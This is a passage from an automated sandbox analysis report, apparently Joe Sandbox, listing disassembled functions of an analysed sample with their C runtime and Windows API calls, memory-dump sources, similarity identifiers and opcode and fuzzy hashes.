                                                                                                                                                                                                                                  Function 05BC6E8C Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC6EA0
                                                                                                                                                                                                                                    • Part of subcall function 05BC6501: HeapFree.KERNEL32(00000000,00000000,?,05BCF3B8,?,00000000,?,00000000,?,05BCF65C,?,00000007,?,?,05BCFA50,?), ref: 05BC6517
                                                                                                                                                                                                                                    • Part of subcall function 05BC6501: GetLastError.KERNEL32(?,?,05BCF3B8,?,00000000,?,00000000,?,05BCF65C,?,00000007,?,?,05BCFA50,?,?), ref: 05BC6529
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC6EAC
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC6EB7
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC6EC2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC6ECD
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC6ED8
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC6EE3
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC6EEE
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC6EF9
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC6F07
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
                                                                                                                                                                                                                                  • Instruction ID: 2fb9dd138f7b907516465e2e41b66faa69006ee3a724fc69478ed121dd07104c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8011B376A0010CBFCB11EF98C845DD93FA5EF04354B6184E9FA0A8F235DA32FA509B85
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004011B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004011B5
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204
                                                                                                                                                                                                                                    • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
                                                                                                                                                                                                                                    • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 00401225
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00401233
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                                                  • API String ID: 835844855-1405518554
                                                                                                                                                                                                                                  • Opcode ID: 5a325a68ccf4bdc99371d265bda0e11596e817bf0efbd4651ddb8449f53c4424
                                                                                                                                                                                                                                  • Instruction ID: 963657a0c5d8f337c123b09bbff0c4169cb5784efefba0bb6704a6d5c2622931
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a325a68ccf4bdc99371d265bda0e11596e817bf0efbd4651ddb8449f53c4424
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E319F31905B40DEC7319F6AD941A5BFBF0BF48714B508A7FE04AA3AA1C738A504CB5D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BB43F0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 05BB43F5
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 05BB4404
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 05BB441B
                                                                                                                                                                                                                                    • Part of subcall function 05BB157F: std::_Lockit::_Lockit.LIBCPMT ref: 05BB1590
                                                                                                                                                                                                                                    • Part of subcall function 05BB157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05BB15AA
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 05BB4424
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 05BB4455
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 05BB446B
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 05BB4491
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                  • String ID: {wB
                                                                                                                                                                                                                                  • API String ID: 1202896665-1598656814
                                                                                                                                                                                                                                  • Opcode ID: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
                                                                                                                                                                                                                                  • Instruction ID: 572c15bab2398959b2223d46bb98cf12b8bc89b898a0e2e46b9d035d17d0405b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40119072A001149BDF15EBA8DC49AFD7776FF84210F1445A9E812B7290EFF4BA01C7A1
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BB3651 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 05BB3656
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 05BB3665
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 05BB367C
                                                                                                                                                                                                                                    • Part of subcall function 05BB157F: std::_Lockit::_Lockit.LIBCPMT ref: 05BB1590
                                                                                                                                                                                                                                    • Part of subcall function 05BB157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05BB15AA
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 05BB3685
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 05BB36B6
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 05BB36CC
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 05BB36F2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                  • String ID: {wB
                                                                                                                                                                                                                                  • API String ID: 1202896665-1598656814
                                                                                                                                                                                                                                  • Opcode ID: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
                                                                                                                                                                                                                                  • Instruction ID: 55ee941de31098713661a4e5ca7ab9acfdc294cc2dc46e5757e0a2d88f5649cb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4411A372E001249BDB15EBA8CC58AFE7BB5EF84350F1405A9E412B7290DBF4BA04C7A4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BB385C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 05BB3861
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 05BB3870
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 05BB3887
                                                                                                                                                                                                                                    • Part of subcall function 05BB157F: std::_Lockit::_Lockit.LIBCPMT ref: 05BB1590
                                                                                                                                                                                                                                    • Part of subcall function 05BB157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05BB15AA
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 05BB3890
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 05BB38C1
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 05BB38D7
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 05BB38FD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                  • String ID: {wB
                                                                                                                                                                                                                                  • API String ID: 1202896665-1598656814
                                                                                                                                                                                                                                  • Opcode ID: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
                                                                                                                                                                                                                                  • Instruction ID: 18597a33dd5b92b1e2c5dc5e01426819e0a1a0be91a2262daeb4c851affce230
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC11A772E001289BDB15EBA4CC48AFDB7B5EF84710F1445AAE415B7290DFF4B904C7A1
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BC9514 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 26e97803392628a66f226ceeca960576ab6ae59f7b73d64c31b09e82fec4626e
                                                                                                                                                                                                                                  • Instruction ID: 91ae703abf9250064134bb72a4a56c2997fb2623f6fa96381118bf4dda39b025
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26e97803392628a66f226ceeca960576ab6ae59f7b73d64c31b09e82fec4626e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74C1BF75A09249AFEB11DFA8C884BADBFB1BF09310F0941DDE441A7391CB34B941CB69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00414A4A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 00414CF4
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414D65
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414D7E
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414DB0
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414DB9
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414DC5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                  • String ID: C
                                                                                                                                                                                                                                  • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                  • Opcode ID: 867fa0ef6cc85311a84fab34ced728f8fa705af9a4dc30a667b1e83018fa5afb
                                                                                                                                                                                                                                  • Instruction ID: 4e3572d10ca72b0cc8c55f95b2e81b49ef67830968b65e4bef4c2f16e2eaf972
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 867fa0ef6cc85311a84fab34ced728f8fa705af9a4dc30a667b1e83018fa5afb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71B11875A012199BDB24DF18D884BEEB7B4FF88314F6045AAE809A7350E735AE91CF44
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BC4CB1 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: GetLastError.KERNEL32(?,?,05BBE697,?,?,?,05BBED94,?), ref: 05BC6F84
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: _free.LIBCMT ref: 05BC6FB7
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: SetLastError.KERNEL32(00000000), ref: 05BC6FF8
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: _abort.LIBCMT ref: 05BC6FFE
                                                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 05BC4F5B
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC4FCC
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC4FE5
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC5017
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC5020
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC502C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                  • String ID: C
                                                                                                                                                                                                                                  • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                  • Opcode ID: cb8600919e0bc0bfd4afc96a1d1b02341e3be43e8f324f1b28cbb9493ad17bb2
                                                                                                                                                                                                                                  • Instruction ID: ab24d792bfbb3046242da5962960fb44ff564477dad30d1776fada7427cefab9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb8600919e0bc0bfd4afc96a1d1b02341e3be43e8f324f1b28cbb9493ad17bb2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82B15775A0161A9FDB24DF18C898AADBBB5FB08305F1045EED84AA7350E730BE80CF44
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041673F Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 004167D1
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 004168B6
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00416926
                                                                                                                                                                                                                                    • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0041692F
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00416954
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3864826663-0
                                                                                                                                                                                                                                  • Opcode ID: b8827a1c079bf13245f6a2b5397cba4bf80c3eb245bf2fea745f98744adb5078
                                                                                                                                                                                                                                  • Instruction ID: 26764a85889f0707fbffed2f2a276afb84307330fa482a04e449b3980190c86e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8827a1c079bf13245f6a2b5397cba4bf80c3eb245bf2fea745f98744adb5078
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C51D4B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFD04D6280DB38DC80C6A8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041EF07 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 7da7e4f938cfb7f53f4ee3042c9ba99eb24c12608d8937e14d039355d897170d
                                                                                                                                                                                                                                  • Instruction ID: 68ef0a4baed83bf313a212b59b327df333dc31b97233ae496646a1f671aa2022
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7da7e4f938cfb7f53f4ee3042c9ba99eb24c12608d8937e14d039355d897170d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A61B171900205AFDB20DF65C841BEABBF4EF48710F1441BBED44EB252E734AD868B98
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BCF16E Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 16879e562c41d271cc16cff151e7cbd4d44b0ffa200e9325e312bb0433d02818
                                                                                                                                                                                                                                  • Instruction ID: 33f826b8fa5ae3ca5756e30b56d824f5193f327fa4160b0c7b8091a776c511d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16879e562c41d271cc16cff151e7cbd4d44b0ffa200e9325e312bb0433d02818
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03618175E04205AFDB20DFA8C841BAABFB6FB44710F2441EDE945EB240DB70B9418B98
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00415A13 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00415AD0
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00415AEB
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                  • Opcode ID: 0ae999e74c312fbf0247888fa3a2934b9317c3a2d6cc292263a5c2c0b7bdde97
                                                                                                                                                                                                                                  • Instruction ID: 97884a52693caeb5a5c3a9d5f4bc50bcec63f9a7d6aba0d10f38b6cf3ce1f43d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ae999e74c312fbf0247888fa3a2934b9317c3a2d6cc292263a5c2c0b7bdde97
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C051F1B1A05608DFDB10CFA8D881BEEBBF4EF49310F14416BE955E3291D774A981CB68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BC5C7A Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,05BC63EF,?,?,?,?,?,?), ref: 05BC5CBC
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 05BC5D37
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 05BC5D52
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 05BC5D78
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,05BC63EF,00000000,?,?,?,?,?,?,?,?,?,05BC63EF,?), ref: 05BC5D97
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,05BC63EF,00000000,?,?,?,?,?,?,?,?,?,05BC63EF,?), ref: 05BC5DD0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                  • Opcode ID: cb6d35f48d1bebdfaee63c5326d5eda48187afe5479d9753ca614cb5bfedeae6
                                                                                                                                                                                                                                  • Instruction ID: f8d10c082c9d563c1c4a590532fa4933080b9f5f499c78a9b174a70a0d19b4be
